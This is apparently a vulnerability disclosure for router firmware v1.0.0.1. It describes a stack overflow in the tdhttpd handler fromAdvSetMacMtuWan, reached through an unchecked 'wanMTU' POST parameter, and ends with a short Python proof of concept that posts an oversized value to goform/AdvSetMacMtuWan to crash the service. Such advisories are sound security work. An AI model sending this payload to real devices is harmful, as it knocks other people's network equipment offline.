Skip to content

Latest commit

 

History

History
33 lines (20 loc) · 969 Bytes

File metadata and controls

33 lines (20 loc) · 969 Bytes

Overview

Affected version

v1.0.0.1

Vulnerability details

tdhttpd in directory /bin has a stack overflow vulnerability. The vulnerability occurrs in the fromAdvSetMacMtuWan function, which can be accessed via the URL goform/AdvSetMacMtuWan.

The vulnerability is located in the function sub_658D8 called by fromAdvSetMacMtuWan.

  • 1.png

After getting the POST parameter wanMTU, the function does not verify its length and copies it directly to local variables on the stack, resulting in stack overflow.

PoC

Poc of Denial of Service(DoS)

import requests

data = {
    b"wanMTU": b'A'*0x800,
}
res = requests.post("http://127.0.0.1/goform/AdvSetMacMtuWan", data=data)
print(res.content)